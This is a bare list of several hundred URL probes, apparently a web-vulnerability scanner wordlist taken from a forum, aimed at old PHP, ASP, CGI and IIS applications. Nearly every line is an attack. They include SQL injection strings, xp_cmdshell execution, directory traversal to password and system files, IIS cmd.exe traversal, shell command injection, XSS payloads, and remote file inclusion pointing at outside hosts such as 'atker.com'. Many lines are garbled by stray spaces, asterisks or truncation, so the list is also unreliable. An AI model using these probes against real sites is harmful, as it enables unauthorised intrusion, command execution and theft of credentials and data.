/php-nuke/modules.php?name=Surveys&pollID=a'sql_inject
/php-nuke/admin.php?op=login&pwd=123&aid=Admin'sql_stuff
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/phpMyAdmin/tbl_copy.php?strCopyTableOK=".passthru('/bin/ls')."
/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name= test.haxor2&strCopyTableOK=".passt
/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
/phpmyadmin/export.php?what=../../../../../../etc/hosts%00
/phpmyadmin/
/phplinks/index.php?show=ruaosleas
/phplinks/include/email_confirmation.php?UserName=x&Email= x@target&site_TiTle=test_&emai
/phpinfo.php3
/phpinfo.php
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/phpgedview/functions.php?PGV_BASE_DIRECTORY=another_host
/phpgedview/config_gedcom.php?PGV_BASE_DIRECTORY=another_host
/phpgedview/authentication_index.php?PGV_BASE_DIRECTORY=anothe r_host
/php-coolfile/action.php?action=edit&file=config.php
/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20w here%20username%3 D'hosch
/phpbb206c/admin/admin_words.php?mode=edit&id=1/*">**********alert(****************);
/phpBB2/viewtopic.php?sid=1&topic_id=-1&view=newest
/phpBB2/search.php?search_id=1\
/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=host_w ith_includes/functions_s
/phpBB/viewtopic.php?topic_id=xss_things
/phpBB/phpinfo.php
/phpBB/bb_memberlist.php?sortby=user_regdate
/phpbb/admin/admin_words.php?mode=edit&id=1/*">**********alert(****************);</sc
/phpbb/admin/admin_ug_auth.php
/php-affiliate/details2.php
/php_my_admin/
/php/phpinfo.php3
/php/phpinfo.php
/php/info.php3
/php/info.php
/php/index.php
/photorate/new.php
/photoalbum/admin/adminlogin.asp
/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99_union_stuff
/phorum/viewtopic.php?id=some_shit&t_id=2
/phorum/register.php
/phorum/download.php
/phorum/admin/actions/del.php?include_path=http://phonehomedotcom&cmd=ls
/pforum/edituser.php
/perl/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/perl/
/perl
/PDG_Cart/shopper.conf
/PDG_Cart/order.log
/pccsmysqladm/incs/dbconnect.inc
/PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/pbl/index.php
/pbcgi.cgi?name=tistname&email=
/payonline.asp
/patch/index.php
/passwords/
/password/
/password.txt
/password.inc
/password.db
/password.dat
/passcfg
/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1, 2,3)%20INTO%20OUTFILE%2 0'/tmp/file.t
/pass?loginpass=a&redirect=0%2F&Submit=Login
/pals-cgi?palsAction=restart&********Name=pals-cgi
/pages/
/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=`
/pafiledb/pafiledb.php
/pafiledb/includes/team/file.php?fileupl_possib
/ows-bin/perlidlc.bat?&dir
/ows-bin/owa/owa%5futil%2esignature
/ows-bin/owa/owa%5futil%2eshowsource
/ows-bin/*.bat?&dir
/owl/browse.php?loginname=whocares&parent=1&expand=1&or der=creatorid&sortposted=ASC
/outgoing/
/out.php?id=any_word
/orders/orders.txt
/orders/mountain.cfg
/orders/
/order/
/oracle/
/opt/setupt/
/opt/
/oprocmgr-status
/oprocmgr-service
/OpenFile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cB OOT.INI
/opendir.php?requesturl=/etc/hosts
/openbb/board.php?
/op/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/oldfiles/
/old/
/oetaki/oetaki.cgi
/oetaki/oekakibbs.conf
/odbc/
/odbc.inc
/ocp-103/index.php?req_path=another_host_with_funcs_dot_php
/objcheck.asp
/nx/common/cds/menu.inc.php?c_path=otherhost_with__common_lib_lau nch.inc.php
/Nwind/Template/catalog.xml?contenttype=text/overvlowhere
/null.htw?CiWebHitsFile=/global.asa%20&CiRestriction=none&CiHiliteType=Full
/nul..dbm
/nuke73/modules.php?name=Calendar&file=index&type=view&eid =-99%20UNION%20ALL%20SELECT%20
/nuke71/admin.php?op=NukebookEditEntry&nbid=-2%20UNION%20SELECT%20null%20/*
/nuke70/modules/MS_Analysis/TiTle.php
/nuke70/modules/MS_Analysis/mstrack.php
/ntsync4.ntf
/ntsync4.nsf
/nsn/env.bas
/nphp/nphpd.php?nphp_config[LangFile]=/etc/hosts
/NotifyAction.asp?action=AddType&instance=Beeper&en d=end
/node/view/666
/nfuse/asp/launch.asp
/newuser.asp
/newtopic.php?subpath=http://badurl_banniere.php
/newsletter.php?action=1&waroot=http://otherhost_start_php/
/news51/newsdata/data/user.idx
/news_view.asp?ID=sql_things
/news/p-news.php
/news/newsdata/data/user.idx
/news/news.mdb
/news/include/customize.php?l=http://host/otherfile.php
/News/article.php
/news.inc
/newfiles/
/new/
/networking_utils.php
/network_query.php?portNum=80&queryType=all&target= 127.0.0.1%3Bls+-l&Submit=Do+It
/netutils/nettools.php
/nettools.php
/netget?sid=user&msg=300&file=/../../../filename.ext
/names.nsf/Open
/names.nsf
/mysql.class
/myguestBk/admin/index.asp
/myguestBk/admin/delEnt.asp?id=avalidnewsnumber
/MWS/HandleSearch.html?searchTarget=morethan990bytesove rflow
/mwadmin/index.php?real_Cookie_is_auth=1;_uId=1
/msql/
/msadc/samples/adctest.exe
/msadc/samples/adctest.asp
/msadc/msadcs.dll
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
/mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb
/moregroupware/modules/webmail2/index.php
/moregroupware/modules/webmail2/inc/
/moregroupware/modules/contact/index.php
/moregroupware/modules/
/more.php?id='sql_things
/modules/WebMail/mailattach.php?userfile=../../some.php&userfile_name=../attachments/file
/modules/WebMail/mailattach.php?userfile_name=../../AvantGo/language/file.php
/modules/WebMail/mailattach.php
/modules/WebChat/index.php
/modules/mylinks/brokenlink.php
/modules/mydownloads/viewcat.php
/modules/mod_mainmenu.php
/modules/glossaire/glossaire-aff.php
/modules/forum/src/Profile.php
/modules/dictionary/search.php?terme=">**********alert(1)</script>
/modules.php?set_albumName=album01&id=aaw&op=modloa d&name=gallery&file=index&include=../
/modules.php?op=modload&name=Web_Links&file=index&l _op=viewlink&cid=2%23sql_injection
/modules.php?op=modload&name=Forums&file=viewtopic& topic=1&forum=1'sql
/modules.php?op=modload&name=Forums&file=viewforum& forum='%20OR%201=1;--
/modules.php?op=modload&name=Forums&file=reply&foru m=1');--
/modules.php?op=modload&name=Forums&file=newtopic&f orum=1');--
/modules.php?op=modload&name=Forums&file=editpost&f orum=1';--
/modules.php?op=modload&name=Forums&file=attachment &AtchOp=show
/modules.php?name=Your_Account&op=userinfo&uname=
/modules.php?name=Surveys&pollID=a'sql_inject
/modules.php?name=News&file=article&sid=1234%20or%2 01=1
/modules.php?name=Members_List&letter='%20OR%20user _level='4'/*
/modules.php?name=Members_List&&sql_debug=1
/modules.php?name=Downloads&d_op=viewdownload&cid=5 9%20or%20cid=2
/modules.php?name=AvantGo&file=print&sid=textgoeshe rexxx
/module.php?link=http://anotherhost_file_extension
/modsecurity.php?inc_prefix=obox/htmlheader.php
/modif/ident.php?id=validmemberidnumeric&pass='%20OR%20'' ='
/modeles/haut.php?dirroot=http://badhost_with_lang_lang.php&SESSION= .
/mmstdol.pl
/mmstdol.cgi
/mmstdod.pl
/mmstdod.cgi
/minivend/catalog.cfg
/messageboard/Forum.asp?QuestionNumber='+sql_stuff&Find=1&Catego ry=1
/merchants/admin.pw
/members.asp?mode=search&M_NAME=A&initial=1&method=
/megabook/files/20/setup.db
/megabook/admin.cgi?default_pass_is_megabook
/marketing/
/manual/
/manual.php
/mantis/view_all_bug_page.php
/mantis/login_page.php?g_****_include_file=every_file
/mantis/core/bug_api.php?t_core_dir=_another_host_with_relation ship_api.php
/manpage/index.php?command=/etc/resolv.conf
/manage/login.asp?User=admin&Pass='+or+'1'='1
/manage/cgi/cgiproc?Nocfile=
/mambo/banners.php?op=click&bid=100%2f*+
/mambo/administrator
/mall_log_files/order.log
/mall_log_files/
/main/cafenews.php
/main.cgi?next_file=/etc/hosts
/main.cgi?next_file=/etc/hosts
/main.asp+.htr
/mailw46.ntf
/mailw46.nsf
/mails/message.mdb
/mailman/edithtml
/mailbox.ntf
/mailbox.nsf
/mailattach.php?submit=1&attach1=admin/original/config.php&attach1_name=../DBInfos.txt
/mail?
/mail/vpopmail.php
/mail/src/search.php
/mail/src/read_bOdy.php
/mail/src/compose.php?mailbox="script_stuff
/mail/message.mdb
/mail/m602cl3w.exe?A=GetFile&U=9&DL=0&FN=../../../boot.ini
/mail/admin/../settings.html.
/mail/admin/../include.html.
/mail/admin
/mail/
/mab.nsf
/ls|
/logs/WS_FTP.LOG
/logs/webstar.log
/login/?user=_cmd_with_pipes_and_backticks
/login/
/logicworks/logicworks.ini
/logicworks.ini
/logfiles/
/logbook.pl?file=cmdpipe
/log/WS_FTP.LOG
/log/
/log.nsf
/livredor/index.php?XSS
/list
/library/lib.php
/library/editor/editor.php?root=myhost_library__editor__PropAcce_s tring.php
/library/
/lib/
/level/99/exec/show/config
/level/15/exec/show/config
/level/1/exec/show/config
/level/0/exec/show/config
/ldap/cgi-bin/ldacgi.exe?Action=**********alert(88</script>
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+http
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.nc
/lcgi/lcgitest.nlm
/kernel/classes/ezsearchlog.php
/kernel/classes/ezsearch.php
/kernel/classes/ezrole.php
/k/home?dir=/&file=../../../../../../../../etc/hosts&lang=en
/jta20.jar
/jsptest.jsp+
/jsptest.jsp\
/jsp_test/PoolMan.jsp
/jsp/view_source.jsp
/jsp/upload.jsp
/jsp/source.jsp
/jongeren/Gastenboek/sign.asp
/join.cfm
/jgb_eng_php3/jgb.php3
/jgb_eng_php3/cfooter.php3
/jdbc/
/jave/
/java/
/jaf/index.php?show=../../../../../../../etc/hosts
/isqlplus?action=logon&username=xssthings&password= xssthings
/isapi/tstisapi.dll
/isapi/count.pl
/ipchat.php?root_path=anotherhost_with_conf_global. php
/ipb/ssi.php?a=out&type=xml&f=0)
/intranet/browse.php?loginname=whocares&parent=1&expand=1&or der=creatorid&sortposted=ASC
/intranet/
/intra/
/interscan/cgi-bin/FtpSave.dll?yes
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?I'm%20here
/internal/
/internal.sws?../../windows/system.ini
/install-files/
/installfiles/
/install/
/install.php?phpbb_root_dir=myservertataa
/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select% 20userid%20from%20users)
/ingenium/config/config.txt
/info/
/info.php3
/info.php
/info.dat
/indilist.php?alpha=\&surname_sublist=\
/index.search
/index.php3?vhosts=http://go.to
/index.php3.%5c../..%5cconf/httpd.conf
/index.php3%20%20
/index.php?topic=te'st/sqlinject
/index.php?subpath= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/index.php?pymembs=admin
/index.php?file=http://xxx&fcmd=ls
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2F etc
/index.php%20%20
/index.jsp::$DATA
/index.jsp../
/index.jsp..
/index.JSP
/index.js%70
/index.JHTML
/index%2ejsp
/incoming/
/includes/hotnews-engine.inc.php3?config[header]=host_file_etc
/includes/hotnews-engine.inc.php?config[header]=host_file_etc
/includes/hnmain.inc.php3?config[incdir]=anotherhost_with_func.inc.php3
/includes/hnmain.inc.php3?config[incdir]=another_host_withhndefs.inc.php3
/includes/header.php3?my_header=xyz
/includes/global.inc
/includes/functions/pmwh.php
/includes/footer.php3?my_footer=yxz
/includes/config.php3
/includes/config.php
/includes/config.inc
/includes/Cache/Lite/Function.php?mosConfig_absolute_path=other_host_
/includes/add.php
/includes/
/include/test.php
/include/sql.php
/include/sql.inc
/include/postgres65.php?inc_dir= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/include/options_form.php
/include/oci8.php?inc_dir=http://www.atker.com&ext=txt
/include/news.inc
/include/mysql.php?inc_dir=http://www.atker.com&ext=txt
/include/mssql7.php?inc_dir= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/include/msql.php?inc_dir=http://www.atker.com&ext=txt
/include/livre_include.php
/include/help.php?base=anotherserver_with_include_common.in c
/include/functions.inc
/include/default_header.php
/include/dbconfig.inc
/include/db.inc
/include/database.inc
/include/data.inc
/include/config.inc.php?lvc_include_dir=server_with__slash_ db_slashdb_mysql.inc.php
/include/config.inc
/include/
/include.php?path= contact.php&contact_email=">xss_things
/inc/test.php
/inc/sql.inc
/inc/sendmail.inc
/inc/odbc.inc
/inc/news.inc
/inc/functions.inc
/inc/dbase.php?prefix=myhost
/inc/db.inc
/inc/database.inc
/inc/data.inc
/inc/config.php?prefix=myhost
/inc/common.load.php?prefix=myhost
/inc/
/in.php?id=any_word
/import/
/imp/mailbox.php3?actionID=6&server=x&imapuser=x';sqlth ings
/imp/compose.php
/img_upload/
/img_upl/
/imageview.php?zoomval=blah
/imageview.php?filename=/
/images_upload/
/images_upl/
/images/tmp.txt
/images/?pattern=/*&sort=name
/iissamples/sdk/asp/interaction/ServerVariables_VBScript.asp
/iissamples/sdk/asp/interaction/ServerVariables_JScript.asp
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/iissamples/sdk/asp/
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_webinfo
/iissamples/ISSamples/SQLQHit.asp?CiColumns=*&CiScope=extended_fileinfo
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=&CiRestriction=none&CiH iliteType=Fu
/iissamples/exair/search/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/HowItWorks/CodeBrws.asp
/iissamples/
/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_Seco ndTab=All&GroupName=
/iishelp/iis/misc/iirturnh.htw
/iisadmpwd/anot3.htr
/iisadmpwd/anot.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp.htr
/iisadmpwd/achg.htr
/iisadmpwd/_AuthChangeUrl
/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/iisadmpwd/
/iisadmin/ism.dll%3fhttp/dir
/ifx/?LO=../../../../../../../../../etc/hosts
/ideas/
/ideabox/include.php?gorumDir=anotherhost_with_notification .php
/idea/
/ibill/
/hypermail
/https-admserv/config/admpw
/https-admserv/bin/perl/importInfo?dir=/tmp
/http-commander/OpenFile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cB OOT.INI
/http-commander/http.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBOOT. INI
/http-commander/getfile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBO OT.INI
/http.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBOOT. INI
/htmltonuke.php?filnavn=xssthings%20example.html
/html/partner.php?mainfile=anything&Default_Theme=xss_sc ript
/html/jsp/fnd/aoljtest.jsp
/html/chatheader.php?mainfile=anything&Default_Theme=xss _script
/html/affich.php?base=_some_server_with_sp- turn.php
/html/
/htdocs/
/htbin/postform?h_mailto=swoopme%40hotmail.com&h_reply-file=../../../../../../../etc/host
/hp/device/this.LCDispatcher
/hostingcontroller
/horde/turba/status.php
/horde/imp/mailbox.php?mailbox=/etc/hosts
/horde/imp/login.php?1=1&imapuser=xss_script
/homepage.nsf
/homebet/homebet.log
/homebet/homebet.dll?form=menu&option=menu-signin
/home/
/hit.php?url_hit=anotherhost_with_config.php
/help.php?file=xss_thing
/hd/winnt/system32/cmd.exe?/c+echo+hello
/guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
/guests/
/guestbook/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/guestbook/sign.asp
/guestbook/pwd
/guestbook/passwd.txt
/guestbook/passwd.db
/guestbook/passwd.dat
/guestbook/passwd
/guestbook/new_entry.asp
/guestbook/insert.inc.php?path=another_host_with_data.inc.php
/guestbook/guestbookdat
/guestbook/gbadmin.cgi?action=setup
/guestbook/gb_eintragen.asp
/guestbook/files/passwd.txt
/guestbook/dcguest.cgi
/guestbook/database/mpcsoftweb_guestdata.mdb
/guestbook/AWSguest.php
/guestbook/admin/o12guest.mdb
/guestbook/admin.php
/guestbook/admin.php
/guestbook/
/guest/insert.inc.php?path=another_host_with_data.inc.php
/guest/gbadmin.cgi?action=setup
/guest/database/mpcsoftweb_guestdata.mdb
/guest/AWSguest.php
/graphs.php?action=edit&vertical_label=$(/bin/ls)
/godllink/admin/admin.php
/go.cgi?artarchive=|id|
/go.cgi?|id|
/globals.pl
/globals.php3?LangCookie=minetataa
/Globals.jsa
/global.inc
/global.cnf
/global.asax.cs
/global.asax
/global.asa+.htr
/global.asa\
/global.asa::$DATA
/global.asa%3f.jsp
/global.asa%3f.htr
/global.asa%20.pl
/global.asa
/getfile.aspx?file=..%5c..%5c..%5c..%5c..%5c..%5cBO OT.INI
/gemitel/html/affich.php?base=_some_server_with_sp-turn.php
/gdbi.php?action=connect&username=Blah
/gbook/insert.inc.php?path=another_host_with_data.inc.php
/gbook/gbadmin.cgi?action=setup
/gb_eintragen.asp
/gb/index.php?login=true
/gb/gb_eintragen.asp
/gb.asp
/gallery/setup/index.php?GALLERY_BASEDIR=another_host_with_util.p hp
/gallery/init.php?HTTP_POST_VARS=xxx&GALLERY_BASEDIR=somedi r
/gallery/displayCategory.php?basepath=http://anotherhost_with_imageFunctions.php
/gallery/displayCategory.php?adminpath= [Linkleri ve resimleri görmek için üye olmalısınız ÜYELİK İÇİN TIKLAYIN]
/gallery/data/adminusers.csv
/gal/data/adminusers.csv
/gaestebuch/yabb.cgi?board=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2 f%2e%2e%2fetc%2fhosts%00
/gaestebuch/new_entry.asp
/gaestebuch/insert.inc.php?path=another_host_with_data.inc.php
/gaestebuch/gb_eintragen.asp
/gaestebuch/files/passwd.txt
/function_foot_1.inc.php
/ftpfiles/
/ftp/
/frontend/x/sql/repairdb.html?db=**********alert('Vulnerable')</script>
/frontend/x/ftp/doaddftp.html?login=">**********alert('Vulnerable' )</script>
/frontend/x/cpanelpro/showlog.html?account=**********alert('Vulnerable') </script>
/frontend/x/cpanelpro/ignorelist.html?account=">**********alert('Vulnera ble')</script>
/fpadmin/
/forums/ssi.php
/forums/sources/functions.php?skinid=huhh
/forums/sm_install.php
/forums/list.php
/forums/forumdisplay.php?s=&forumid=
/forums/download_forum.php
/forums/ avatar.php?img=../secret/connect.php
/forum51/forumdata/data/user.idx
/forum/viewtopic.php?forum=1&showtopic=1'0/sqlinject
/forum/ssi.php
/forum/sources/functions.php?skinid=huhh
/forum/sm_install.php
/forum/register_new_user.asp?ForumID=0
/forum/register.asp??mode=DoIt&Email='%20exec%20master..x p_cmdshell%20'dir'%20--&Name=sn
/forum/private.php
/forum/pm_buddy_list.asp?name=A&desc=xss_things="&code=1
/forum/memberlist.php
/forum/mainfile.php?MAIN_PATH=anotherhost_with_config.php
/forum/index.php?act=Search&nav=lv&CODE=show&searchid=val id_session_id&search_in=topics&
/forum/include/default_header.php?script_path=http://host_with_-include-default_style.css
/forum/include.php?gorumDir=anotherhost_with_group.php
/forum/forumdisplay.php?s=&forumid=
/forum/forumdata/data/user.idx
/forum/download_forum.php
/forum/database/philboard.mdb
/forum/admin/wwforum.mdb
/forum/action.php?action=activation&userid=346&code=35626 8007
/forum/
/foldoc/template.cgi?template.cgi
/Folderactions.asp
/fndwrr.exe
/fndwrr
/fm.php
/files/pwd.txt
/files/pwd.db
/files/pwd.dat
/files/pwd
/files/passwd.txt
/files/passwd.db
/files/passwd.dat
/files/passwd
/files/
/filemgmt/visit.php?lid=1'1'0/sqlinject
/filemgmt/viewcat.php?cid='6/sqlinject
/filemgmt/singlefile.php?lid=17'/0/sqlinject
/filemgmt/brokenfile.php?lid=17'/"%3sqlinject
/filemanager/source.php?../../../../etc/hosts
/filemanager/index.php3?action=telecharger&fichier=/etc/hosts
/filemanager/index.php?action=telecharger&fichier=/etc/hosts
/fileCopy.asp?INPUTFILE=&OUTPUTFILE=
/File_editor.asp
/file/main.shtml
/file/main.jsp
/file/main.jhtml
/file/index.shtml
/file/index.jsp
/file/index.jhtml
/file/
/fcgi-bin/php.ini
/fcgi-bin/echo2
/fcgi-bin/echo
/faqman/index.php?op=view&t=518">xssthins
/famlist.php?alpha=(&surname_sublist=yes&surname=\
/ezhttpbench.php?AnalyseSite=/etc/hosts&NumLoops=1
/ezboard/ezman.cgi
/ezboard/ezboard.cgi
/ezboard/ezadmin.cgi
/ez2000/ezman.cgi
/ez2000/ezboard.cgi
/ez2000/ezadmin.cgi
/extras/quicklist.php?bn=krasl
/ext.ini.%00.txt
/ext.dll?mfcisapicommand=loadpage&page=admin.ats&a0 =add&a1=root&a2=%5C
/ext.dll?MfcIsapiCommand=LoadPage&page= admin.hts%20&a0=add&a1=root&a2=%5C
/ext.dll%00
/ext.dll
/express/cache/
/exec/MsmSetup.exe?tst
/exe/
/exchange/root.asp?acs=anon
/examples/servlet/SnoopServlet
/examples/jsp/view_source.jsp
/examples/jsp/source.jsp
/examples/jsp/snp/anything.snp
/examples/applications/bboard/bboard_frames.html
/example.jsp../
/example.jsp..
/example.jsp%81
/example%2ejsp
/evoweb/?EvoCmd=console
/evo/web/?EvoCmd=console
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmai
/eventscroller.php?path_simpnews=anotherwith_config .php
/events4.nsf
/eventcal2.php.php?path_simpnews=anotherhostwith_co nfig.php
/etc/****dot.conf
/eshop/20Review.asp?ProductCode='
/eshop/10Expand.asp?ProductCode='
/error/HTTP_NOT_FOUND.html.var
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin .ini
/enteteacceuil.php?subpath=http://badurl_banniere.php
/entete.php?subpath=http://badurl_banniere.php
/endon/mod.php?mod=publisher&op=viewcat&cid=<b>test</b%3
/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=|ls|
/emumail.cgi?type=fh%00
/employees/
/emml_email_func.php?emml_path=http://somehost_with_class.html.mime.mail.php
/elitenews/stats.php
/elitenews/login.html
/E-Guest_sign.pl
/eg/source.asp
/edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc%2 fhosts
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/dynamic/
/dyn/
/downloads/
/download/
/download.php?filename=../../../../../../../../../../../../etc/hosts
/down/
/dostuff.php?action=modify_user
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
/domlog.nsf
/domcfg.nsf/viewname%3fSearchView&Query="*"
/domcfg.nsf/URLRedirect/%3fOpenForm
/domcfg.nsf/%3fopen
/dodo/cgi-bin/update_profile.cgi
/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
/docs/NED?action=retrieve&********=http://www.nokia.com
/docs/
/docmgmtout.php
/docman/new.php
/doc-html/
/doc/packages/
/doc/
/do_subscribe?showuser=BOFx?
/do_map?action=new&oldalias=eso&alias=**********ale rt(****************);</script>&folder
/dnstools.php?section=security&user_logged_in=true& user_dnstools_administrator=YES
/dnstools.php?section=hosts&user_logged_in=true
/dms0
/dms/DMSDump
/dms/AggreSpy
/DMR/
/dm/demarc
/disk_c
/discuss/passwd.txt
/directory/gotopage.cgi?13686+/../../../../../../etc/hosts
/directory/genindexpage.cgi?13687+Home+/../../../../../../etc/hosts
/directory/functions.php?clang=../../../../../../../../../../../../etc/hosts
/directory.php?dir=%3Bmore%20/etc/passwd
/dev60cgi/rwcgi60?test&report=
/dev60cgi/rwcgi60.sh?test&report=
/dev60cgi/rwcgi60.exe?test&report=
/dev60cgi/rwcgi60.cgi?test&report=
/details2.php
/details.asp
/deskpro_v1/view.php?ticketid=1'&ticket_pass=
/deskpro_v1/faq.php?cat=45'
/demos?sql=select+*+from+Customers+as+Customer+FOR+ XML+auto&root=root&xsl= custtable.xsl
/demonstration/
/demo/email/sendmail.jsp
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/demo/
/deletecontact.php?item_id=100+OR+TRUE+;
/defines.php?WEBCHATPATH=anothersrvr_language_engli sh.php
/default.php3%20%20
/default.php%20%20
/default.conf
/default.asp+.htr
/default.asp%3f.htr
/decsadm.nsf
/debug/showproc?proc=**********alert('hello');</script>
/debug/errorInfo?TiTle=**********alert('hello');</script>
/debug/echo?name=**********alert('hello');</script>
/debug/dbg?host=**********alert('hello');</script>
/debug.txt
/debug.log
/dcp/lostpassword.php?action=lost&email=xaw@slsdd332sxl sfaked.com
/dcp/advertiser.php?adv_logged=1&username=1&password=qw e'sqlthings
/dbg.txt
/dbg.log
/dbconfig.inc
/dbase/
/dbaccess.txt :
/dba.inc
/db2_doc/html/db2srsen.exe
/db/users.dat
/db/message.mdb
/db/info.php
/db/
/db.inc
/dateiverwaltung.php
/dateiupload.php
/database/philboard.mdb
/database/db2000.mdb
/database/****cart.mdb
/database/
/database.nsf?Edit********
/Data/settings.xml
/data/root.pref
/data/default_pref
/data/adminusers.csv
/data/administrator.pref
/data/admin.pref
/data/
/data.inc
/dat/
/dansguardian/edit.cgi?file=xxx
/cutenews/shownews.php?cutepath=anotherhost_with_config.php_ or_news.txt
/cutenews/search.php?cutepath=anotherhost_with_config.php_or _news.txt
/cutenews/comments.php?cutepath=anotherhost_with_config.php_ or_news.txt
/customers/
/current/modules.php?mod=fm&file=../../../../../../../../../../etc/hosts%00&bn=fm_d1
/current/index.php?site=demos&bn=../../../../../../../../../../etc/hosts%00
/csSearch.cgi?command=savesetup&setup=`/bin/ls`
/CSNews.cgi
/crm/download.php?filename=../../../../../../../../../../../../etc/hosts
/credit/
/cphp/index.php?op=invparam_and_index_dot_php_op_include s_any_file
/cpcommerce/_functions.php?prefix=anotherhost_and_index_with_i ndex_gateways.php
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=a dd&Language=english&Submit=Con
/counter/
/copyFile.asp
/convert-date.php?cal_dir=anotherhost_with_vars.inc_or_pref s.inc
/content/base/build/explorer/none.php?/etc/
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_i d<1000
/contacts.php?cal_dir=anotherhost_with_vars.inc_or_ prefs.inc
/ConsoleHelp/
/console/
/config/config.txt
/config/
/config.inc
/compte.php?achat=1&valider=1&identifiant='%20OR%20 ''='&password='%20OR%20''='
/compose.php
/components/AspUpload/Samples/UploadScript11.asp
/components/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/DirectoryListing.asp
/comment.php?type=filemgmt&cid=filemgmt-1'70/sqlinject
/comment.php?mode=display&sid=foo&pid=;--injecthere&TiTle=hoschi
/comment.php?mode=display&sid=filemgmt-XXX&TiTle=sqlinject
/collect4.ntf
/collect4.nsf
/cocoon/view-source
/cocoon/status
/cocoon/samples/welcome
/cocoon/
/cmsx/upload.php
/cmsx/
/cms-uploads/
/cmsuploads/
/cmsupload/
/cms-up/
/cmsup/
/cms/typo3conf/ext/
/cms/typo3/install/
/cms/typo3/
/cms/fileadmin/log.txt
/cms/fileadmin/
/cms/adm_pages.php?and_/index.php_qm_inc=anotherhost_with_dot_php
/cms/
/cloisterblog/journal.pl?syear=2004&sday=11&smonth=../../../../../../../../etc/passwd%00
/clippings.php?action=add&id=Blah
/cleartrust/ct_logon.asp?CTLoginErrorMsg=XSS
/class/mysql.class
/citrix/****framexp/default/login.asp?NFuse_LogoutId=On&NFuse_MessageType=Erro r&NFuse_Me
/ChipCfg.cfg
/ChipCfg
/chip.ini
/chgpwd.php?USERNAME=existing_user&PASSWORD='%20OR% 20''='
/checkout_payment.php?payment_error=cc&error=<scrip t%20language=javascript>window.ale rt
/checklogin.php?cfgProgDir=http://another/interface.php
/chat/data/usr/
/chat/data/
/chat/admin.php3
/chat/admin.php
/chat/!pwds.txt
